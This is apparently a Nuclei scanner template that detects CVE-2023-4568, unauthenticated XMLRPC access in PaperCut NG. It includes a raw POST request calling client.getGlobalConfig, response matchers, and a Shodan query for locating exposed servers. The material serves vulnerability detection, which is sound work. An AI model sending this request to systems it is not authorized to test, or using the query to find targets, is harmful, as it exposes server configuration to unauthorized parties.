id: CVE-2023-4568

info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.00261
    epss-percentile: 0.63629
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query: html:"content="PaperCut""
  tags: cve,cve2023,unauth,papercut

http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml

        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c26382a4aafe5ca4e8aa0fd49785a365960d8fb997158698b218295390148cb4022100c346a038c6abfa8004408dfd3f1339ef28df0ca1a31cb6f7824bd8e7aaacc14f:922c64590222798bb761d5b6d8e72950